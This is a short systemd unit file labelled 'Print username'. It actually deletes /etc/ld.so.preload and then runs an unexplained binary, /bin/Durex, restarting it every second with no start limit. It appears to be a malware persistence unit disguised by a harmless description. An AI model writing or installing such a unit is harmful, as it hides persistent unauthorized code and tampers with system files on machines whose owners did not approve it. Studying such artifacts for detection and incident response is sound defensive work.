[Unit]
Description=Print username
After=network-online.target
Wants=network-online.target
StartLimitIntervalSec=0

[Service]
Type=simple
Restart=always
RestartSec=1
ExecStartPre=/usr/bin/unlink /etc/ld.so.preload
ExecStart=/bin/Durex

[Install]
WantedBy=multi-user.target
